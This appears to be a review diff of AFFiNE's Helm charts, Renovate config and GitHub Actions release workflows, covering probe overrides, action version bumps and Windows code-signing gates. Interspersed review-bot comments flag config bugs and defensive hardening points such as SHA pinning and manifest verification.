timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.liveness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.liveness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.liveness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.liveness.successThreshold }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
initialDelaySeconds: {{ default .Values.probe.initialDelaySeconds .Values.probe.readiness.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.readiness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.readiness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.readiness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.readiness.successThreshold }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
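Review bot: `successThreshold` on the liveness probe should not be overridable; Kubernetes accepts only 1 there, so any other `probe.liveness.successThreshold` makes the Deployment fail validation. Hard-code it for liveness and keep the override for readiness only. Separately, `default` treats 0 as empty, so an explicit `initialDelaySeconds: 0` under `probe.liveness` or `probe.readiness` silently falls back to the shared `probe.initialDelaySeconds`.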
@@ -1,19 +1,19 @@
apiVersion: v1
kind: Service
metadata:
name: {{ include "doc.fullname" . }}
name: {{ .Values.global.docService.name }}
labels:
{{- include "doc.labels" . | nindent 4 }}
{{- with .Values.service.annotations }}
{{- include "front.labels" . | nindent 4 }}
{{- with .Values.services.doc.annotations }}
annotations:
{{- toYaml . | nindent 4 }}
{{- end }}
spec:
type: {{ .Values.service.type }}
type: {{ .Values.services.doc.type }}
ports:
- port: {{ .Values.global.docService.port }}
targetPort: http
protocol: TCP
name: http
selector:
{{- include "doc.selectorLabels" . | nindent 4 }}
{{- include "front.selectorLabels" . | nindent 4 }}
+15 -1
View File
@@ -29,12 +29,23 @@ podSecurityContext:
fsGroup: 2000
resources:
limits:
cpu: '1'
memory: 6Gi
requests:
cpu: '1'
memory: 2Gi
memory: 4Gi
probe:
initialDelaySeconds: 20
timeoutSeconds: 5
periodSeconds: 10
failureThreshold: 6
successThreshold: 1
liveness:
initialDelaySeconds: 60
failureThreshold: 12
readiness: {}
services:
sync:
@@ -54,6 +65,9 @@ services:
type: ClusterIP
port: 8080
annotations: {}
doc:
type: ClusterIP
annotations: {}
nodeSelector: {}
tolerations: []
@@ -12,6 +12,10 @@ spec:
targetPort: cloud-sql-proxy
protocol: TCP
name: cloud-sql-proxy
- port: 9801
targetPort: 9801
protocol: TCP
name: health
selector:
{{- include "gcloud-sql-proxy.selectorLabels" . | nindent 4 }}
{{- end }}
@@ -3,7 +3,7 @@ name: graphql
description: AFFiNE GraphQL server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -23,6 +23,22 @@ spec:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "graphql.serviceAccountName" . }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
@@ -95,11 +111,19 @@ spec:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.liveness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.liveness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.liveness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.liveness.successThreshold }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.readiness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.readiness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.readiness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.readiness.successThreshold }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
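Review bot: both `initialDelaySeconds` lines in this template still read `.Values.probe.initialDelaySeconds` directly, while the four fields added beneath each go through `default` with `.Values.probe.liveness.*` or `.Values.probe.readiness.*`, so a `probe.liveness.initialDelaySeconds` set for graphql is ignored. The front template wraps this field in `default` as well; do the same here so the two charts behave alike.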
@@ -13,6 +13,22 @@ spec:
template:
spec:
serviceAccountName: {{ include "graphql.serviceAccountName" . }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
+11 -1
View File
@@ -27,12 +27,22 @@ podSecurityContext:
fsGroup: 2000
resources:
limits:
cpu: '1'
memory: 4Gi
requests:
cpu: '2'
cpu: '1'
memory: 2Gi
probe:
initialDelaySeconds: 20
timeoutSeconds: 5
periodSeconds: 10
failureThreshold: 6
successThreshold: 1
liveness:
failureThreshold: 12
readiness: {}
nodeSelector: {}
tolerations: []
+4 -6
View File
@@ -47,12 +47,6 @@ graphql:
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
doc:
service:
type: ClusterIP
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
front:
services:
sync:
@@ -71,3 +65,7 @@ front:
name: affine-web
type: ClusterIP
port: 8080
doc:
type: ClusterIP
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
+3 -3
View File
@@ -31,7 +31,7 @@
"groupSlug": "all-minor-patch",
"matchUpdateTypes": ["minor", "patch"],
"matchManagers": ["npm"],
"matchPackageNames": ["*", "!/^@blocksuite//", "!/oxlint/"]
"excludePackagePatterns": ["^@blocksuite/", "^oxlint$"]
},
{
"groupName": "all non-major dependencies",
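Review bot: the two forms do not exclude the same packages. `!/oxlint/` was an unanchored match that kept every package with `oxlint` anywhere in its name out of this group, while `^oxlint$` excludes only the package named exactly `oxlint`; if related packages are meant to stay out, drop the anchors. This rule also ends up with no `matchPackageNames` at all while the `customManagers` hunk below moves from `fileMatch` to `managerFilePatterns`, so check that the Renovate version in use accepts both `excludePackagePatterns` and `managerFilePatterns` without a config migration warning.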
@@ -63,7 +63,7 @@
"groupName": "opentelemetry",
"matchPackageNames": [
"/^@opentelemetry/",
"/^@google-cloud\/opentelemetry-/"
"/^@google-cloud/opentelemetry-/"
]
}
],
@@ -79,7 +79,7 @@
"customManagers": [
{
"customType": "regex",
"fileMatch": ["^rust-toolchain\\.toml?$"],
"managerFilePatterns": ["/^rust-toolchain\\.toml?$/"],
"matchStrings": [
"channel\\s*=\\s*\"(?<currentValue>\\d+\\.\\d+(\\.\\d+)?)\""
],
+7 -3
View File
@@ -1,6 +1,10 @@
name: 'Pull Request Labeler'
on:
- pull_request_target
pull_request_target:
types:
- opened
- reopened
- synchronize
jobs:
triage:
@@ -9,5 +13,5 @@ jobs:
pull-requests: write
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/labeler@v5
- uses: actions/checkout@v6
- uses: actions/labeler@v6
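Review bot: this job runs on `pull_request_target` with `pull-requests: write`, and both `uses:` lines reference mutable tags (`@v6`). Pin `actions/checkout` and `actions/labeler` to full commit SHAs, and keep the checkout free of any `ref:` so it never fetches the pull request head into a job that holds a write token. The explicit `types` list in the hunk above matches the event's default activity types, so it documents the trigger rather than narrowing it.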
+8 -8
View File
@@ -24,7 +24,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -57,7 +57,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -89,7 +89,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -118,7 +118,7 @@ jobs:
build-server-native:
name: Build Server native - ${{ matrix.targets.name }}
runs-on: ubuntu-latest
runs-on: ubuntu-22.04
environment: ${{ inputs.build-type }}
strategy:
fail-fast: false
@@ -132,7 +132,7 @@ jobs:
file: server-native.armv7.node
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -166,7 +166,7 @@ jobs:
needs:
- build-server-native
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -202,7 +202,7 @@ jobs:
- build-mobile
- build-admin
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Download server dist
uses: actions/download-artifact@v4
with:
@@ -222,7 +222,7 @@ jobs:
# setup node without cache configuration
# Prisma cache is not compatible with docker build cache
- name: Setup Node.js
uses: actions/setup-node@v4
uses: actions/setup-node@v6
with:
node-version-file: '.nvmrc'
registry-url: https://npm.pkg.github.com
File diff suppressed because it is too large
+4 -4
View File
@@ -10,7 +10,7 @@ jobs:
env:
CARGO_PROFILE_RELEASE_DEBUG: '1'
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
with:
@@ -64,7 +64,7 @@ jobs:
ports:
- 9308:9308
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
@@ -134,7 +134,7 @@ jobs:
ports:
- 9308:9308
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
@@ -167,7 +167,7 @@ jobs:
runs-on: ubuntu-latest
name: Post test result message
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
with:
fetch-depth: 0
- name: Setup Node.js
+3 -2
View File
@@ -16,10 +16,11 @@ jobs:
check-pull-request-title:
name: Check pull request title
runs-on: ubuntu-latest
if: ${{ github.event.action != 'edited' || github.event.changes.title != null }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: actions/setup-node@v4
uses: actions/setup-node@v6
with:
cache: 'yarn'
node-version-file: '.nvmrc'
+1 -1
View File
@@ -35,7 +35,7 @@ jobs:
- build-images
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Deploy to ${{ inputs.build-type }}
uses: ./.github/actions/deploy
with:
@@ -69,7 +69,7 @@ jobs:
SENTRY_DSN: ${{ secrets.SENTRY_DSN }}
SENTRY_RELEASE: ${{ inputs.app_version }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
@@ -101,7 +101,7 @@ jobs:
- name: Signing By Apple Developer ID
if: ${{ inputs.platform == 'darwin' && inputs.apple_codesign }}
uses: apple-actions/import-codesign-certs@v5
uses: apple-actions/import-codesign-certs@v7
with:
p12-file-base64: ${{ secrets.CERTIFICATES_P12 }}
p12-password: ${{ secrets.CERTIFICATES_P12_PASSWORD }}
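Review bot: `apple-actions/import-codesign-certs@v7` receives `CERTIFICATES_P12` and `CERTIFICATES_P12_PASSWORD`, so a jump of two major versions on a mutable tag should be pinned to a full commit SHA. Review the action's changes between v5 and v7 before the signing secrets are handed to it.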
@@ -174,18 +174,18 @@ jobs:
run: |
mkdir -p builds
mv packages/frontend/apps/electron/out/*/make/zip/linux/${{ inputs.arch }}/*.zip ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.zip
mv packages/frontend/apps/electron/out/*/make/*.AppImage ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.appimage
mv packages/frontend/apps/electron/out/*/make/AppImage/${{ inputs.arch }}/*.AppImage ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.appimage
mv packages/frontend/apps/electron/out/*/make/deb/${{ inputs.arch }}/*.deb ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.deb
mv packages/frontend/apps/electron/out/*/make/flatpak/*/*.flatpak ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.flatpak
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ inputs.platform == 'darwin' }}
with:
subject-path: |
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-macos-${{ inputs.arch }}.zip
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-macos-${{ inputs.arch }}.dmg
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ inputs.platform == 'linux' }}
with:
subject-path: |
+174 -24
View File
@@ -27,6 +27,11 @@ on:
required: false
default: true
type: boolean
require-windows-signing:
description: 'Require all Windows signing steps to succeed before release'
required: false
default: false
type: boolean
permissions:
actions: write
@@ -48,7 +53,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -73,6 +78,21 @@ jobs:
name: desktop-web
path: packages/frontend/apps/electron/resources/web-static
windows-signer-gate:
if: ${{ inputs.desktop_windows }}
runs-on: ubuntu-latest
outputs:
signer_available: ${{ steps.check.outputs.signer_available }}
steps:
- uses: actions/checkout@v6
- name: Check windows signer availability
id: check
run: node ./scripts/check-windows-signer.mjs
env:
BUILD_TYPE: ${{ inputs.build-type }}
GITHUB_TOKEN: ${{ github.token }}
REQUIRE_SIGNER: ${{ inputs.require-windows-signing }}
make-distribution-macos:
if: ${{ inputs.desktop_macos }}
strategy:
@@ -154,24 +174,45 @@ jobs:
enable_scripts: true
sign-packaged-artifacts-windows_x64:
if: ${{ inputs.desktop_windows }}
needs: package-distribution-windows-x64
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- package-distribution-windows-x64
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.package-distribution-windows-x64.outputs.files_to_be_signed }}
artifact-name: packaged-win32-x64
sign-packaged-artifacts-windows_arm64:
if: ${{ inputs.desktop_windows }}
needs: package-distribution-windows-arm64
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- package-distribution-windows-arm64
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.package-distribution-windows-arm64.outputs.files_to_be_signed }}
artifact-name: packaged-win32-arm64
make-windows-installer:
if: ${{ inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_windows &&
needs.windows-signer-gate.result == 'success' &&
needs.package-distribution-windows-x64.result == 'success' &&
needs.package-distribution-windows-arm64.result == 'success' &&
(
!inputs.require-windows-signing ||
(
needs.sign-packaged-artifacts-windows_x64.result == 'success' &&
needs.sign-packaged-artifacts-windows_arm64.result == 'success'
)
)
}}
needs:
- windows-signer-gate
- package-distribution-windows-x64
- package-distribution-windows-arm64
- sign-packaged-artifacts-windows_x64
- sign-packaged-artifacts-windows_arm64
strategy:
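Review bot: in the `make-windows-installer` condition, `!inputs.require-windows-signing` short-circuits past both `sign-packaged-artifacts-*` results, so a signing job that ran and failed is treated the same as one that was skipped because no signer was available. Accept only `'success'` or `'skipped'` in the non-required branch, so that a signer that is present but broken stops the pipeline instead of producing an installer from unsigned binaries.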
@@ -187,7 +228,7 @@ jobs:
FILES_TO_BE_SIGNED_x64: ${{ steps.get_files_to_be_signed.outputs.FILES_TO_BE_SIGNED_x64 }}
FILES_TO_BE_SIGNED_arm64: ${{ steps.get_files_to_be_signed.outputs.FILES_TO_BE_SIGNED_arm64 }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -201,13 +242,46 @@ jobs:
nmHoistingLimits: workspaces
env:
npm_config_arch: ${{ matrix.spec.arch }}
- name: Download and overwrite packaged artifacts
- name: Download packaged artifacts
uses: actions/download-artifact@v4
with:
name: packaged-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: packaged-unsigned
- name: unzip packaged artifacts
run: Expand-Archive -Path packaged-unsigned/archive.zip -DestinationPath packages/frontend/apps/electron/out
- name: Download signed packaged file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: signed-packaged-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: .
- name: unzip file
run: Expand-Archive -Path signed.zip -DestinationPath packages/frontend/apps/electron/out
path: signed-packaged-diff
- name: Apply signed packaged file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success') }}
shell: pwsh
run: |
$DiffRoot = 'signed-packaged-diff/files'
$TargetRoot = 'packages/frontend/apps/electron/out'
if (!(Test-Path -LiteralPath $DiffRoot)) {
throw "Signed diff directory not found: $DiffRoot"
}
Copy-Item -Path (Join-Path $DiffRoot '*') -Destination $TargetRoot -Recurse -Force
$ManifestPath = 'signed-packaged-diff/manifest.json'
if (Test-Path -LiteralPath $ManifestPath) {
$ManifestEntries = @(Get-Content -LiteralPath $ManifestPath | ConvertFrom-Json)
foreach ($Entry in $ManifestEntries) {
$TargetPath = Join-Path $TargetRoot $Entry.path
if (!(Test-Path -LiteralPath $TargetPath -PathType Leaf)) {
throw "Applied signed file not found: $($Entry.path)"
}
$TargetHash = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
if ($TargetHash -ne $Entry.sha256) {
throw "Signed file hash mismatch: $($Entry.path)"
}
}
}
- name: Make squirrel.windows installer
run: yarn affine @affine/electron make-squirrel --platform=${{ matrix.spec.platform }} --arch=${{ matrix.spec.arch }}
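Review bot: in the `Apply signed packaged file diff` step the hash verification only runs `if (Test-Path -LiteralPath $ManifestPath)`, so an artifact that arrives without `manifest.json` is applied with no check at all; throw when the manifest is missing. Two further points on the same block: `Copy-Item ... -Recurse -Force` copies everything under `files/` before the manifest is consulted, so files not listed in the manifest are written into `out` unverified, and `Join-Path $TargetRoot $Entry.path` is used without confirming the resolved path stays under `$TargetRoot`. Because the manifest travels in the same artifact as the files, the SHA-256 comparison detects a bad copy but not a substituted artifact; a `Get-AuthenticodeSignature` status check on each applied file would verify the signature itself.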
@@ -232,25 +306,38 @@ jobs:
path: archive.zip
sign-installer-artifacts-windows-x64:
if: ${{ inputs.desktop_windows }}
needs: make-windows-installer
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- make-windows-installer
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.make-windows-installer.outputs.FILES_TO_BE_SIGNED_x64 }}
artifact-name: installer-win32-x64
sign-installer-artifacts-windows-arm64:
if: ${{ inputs.desktop_windows }}
needs: make-windows-installer
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- make-windows-installer
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.make-windows-installer.outputs.FILES_TO_BE_SIGNED_arm64 }}
artifact-name: installer-win32-arm64
finalize-installer-windows:
if: ${{ inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_windows &&
needs.make-windows-installer.result == 'success'
}}
needs:
[
windows-signer-gate,
make-windows-installer,
sign-packaged-artifacts-windows_x64,
sign-packaged-artifacts-windows_arm64,
sign-installer-artifacts-windows-x64,
sign-installer-artifacts-windows-arm64,
before-make,
@@ -267,22 +354,59 @@ jobs:
arch: arm64
runs-on: ${{ matrix.spec.runner }}
steps:
- name: Download and overwrite installer artifacts
- name: Download installer artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: installer-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: installer-unsigned
- name: unzip installer artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
run: Expand-Archive -Path installer-unsigned/archive.zip -DestinationPath packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make
- name: Download signed installer file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: signed-installer-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: .
- name: unzip file
run: Expand-Archive -Path signed.zip -DestinationPath packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make
path: signed-installer-diff
- name: Apply signed installer file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
shell: pwsh
run: |
$DiffRoot = 'signed-installer-diff/files'
$TargetRoot = 'packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make'
if (!(Test-Path -LiteralPath $DiffRoot)) {
throw "Signed diff directory not found: $DiffRoot"
}
Copy-Item -Path (Join-Path $DiffRoot '*') -Destination $TargetRoot -Recurse -Force
$ManifestPath = 'signed-installer-diff/manifest.json'
if (Test-Path -LiteralPath $ManifestPath) {
$ManifestEntries = @(Get-Content -LiteralPath $ManifestPath | ConvertFrom-Json)
foreach ($Entry in $ManifestEntries) {
$TargetPath = Join-Path $TargetRoot $Entry.path
if (!(Test-Path -LiteralPath $TargetPath -PathType Leaf)) {
throw "Applied signed file not found: $($Entry.path)"
}
$TargetHash = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
if ($TargetHash -ne $Entry.sha256) {
throw "Signed file hash mismatch: $($Entry.path)"
}
}
}
- name: Save artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
run: |
mkdir -p builds
mv packages/frontend/apps/electron/out/*/make/zip/win32/${{ matrix.spec.arch }}/AFFiNE*-win32-${{ matrix.spec.arch }}-*.zip ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.zip
mv packages/frontend/apps/electron/out/*/make/squirrel.windows/${{ matrix.spec.arch }}/*.exe ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.exe
mv packages/frontend/apps/electron/out/*/make/nsis.windows/${{ matrix.spec.arch }}/*.exe ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.nsis.exe
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
with:
subject-path: |
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.zip
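Review bot: the same arch-and-result condition is copied onto every step of `finalize-installer-windows`, including `attest-build-provenance`, and one missed copy on a future step would let that step run against unsigned files. Evaluate it once in a first step that writes an output and reference that output from the later steps. The `Apply signed installer file diff` script is also a copy of the packaged-artifact one, with the same optional-manifest behaviour (`if (Test-Path -LiteralPath $ManifestPath)`); moving both into one script under `scripts/` keeps the verification logic in a single place.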
@@ -290,24 +414,48 @@ jobs:
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.nsis.exe
- name: Upload Artifact
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/upload-artifact@v4
with:
name: affine-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}-builds
path: builds
release:
if: ${{ inputs.desktop_macos && inputs.desktop_linux && inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_macos &&
inputs.desktop_linux &&
inputs.desktop_windows &&
needs.before-make.result == 'success' &&
needs.make-distribution-macos.result == 'success' &&
needs.make-distribution-linux.result == 'success' &&
(
!inputs.require-windows-signing ||
(
needs.sign-packaged-artifacts-windows_x64.result == 'success' &&
needs.sign-packaged-artifacts-windows_arm64.result == 'success' &&
needs.sign-installer-artifacts-windows-x64.result == 'success' &&
needs.sign-installer-artifacts-windows-arm64.result == 'success' &&
needs.finalize-installer-windows.result == 'success'
)
)
}}
needs:
[
before-make,
make-distribution-macos,
make-distribution-linux,
sign-packaged-artifacts-windows_x64,
sign-packaged-artifacts-windows_arm64,
sign-installer-artifacts-windows-x64,
sign-installer-artifacts-windows-arm64,
finalize-installer-windows,
]
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Download Artifacts (macos-x64)
uses: actions/download-artifact@v4
with:
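Review bot: when `require-windows-signing` is false the `release` condition ignores `needs.finalize-installer-windows.result` entirely, so a `finalize-installer-windows` run that failed (for example on `Signed file hash mismatch`) does not block the release job by itself. At least reject `'failure'` for that job outside the signing branch, and write a line to the job summary when the release proceeds without Windows artifacts so the omission is visible.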
@@ -319,11 +467,13 @@ jobs:
name: affine-darwin-arm64-builds
path: ./release
- name: Download Artifacts (windows-x64)
if: ${{ needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success' }}
uses: actions/download-artifact@v4
with:
name: affine-win32-x64-builds
path: ./release
- name: Download Artifacts (windows-arm64)
if: ${{ needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success' }}
uses: actions/download-artifact@v4
with:
name: affine-win32-arm64-builds
@@ -333,7 +483,7 @@ jobs:
with:
name: affine-linux-x64-builds
path: ./release
- uses: actions/setup-node@v4
- uses: actions/setup-node@v6
with:
node-version: 20
- name: Copy Selfhost Release Files
+13 -11
@@ -26,7 +26,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -54,7 +54,7 @@ jobs:
build-android-web:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -83,7 +83,7 @@ jobs:
needs:
- build-ios-web
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -114,7 +114,7 @@ jobs:
- name: Cap sync
run: yarn workspace @affine/ios sync
- name: Signing By Apple Developer ID
uses: apple-actions/import-codesign-certs@v5
uses: apple-actions/import-codesign-certs@v7
id: import-codesign-certs
with:
p12-file-base64: ${{ secrets.CERTIFICATES_P12_MOBILE }}
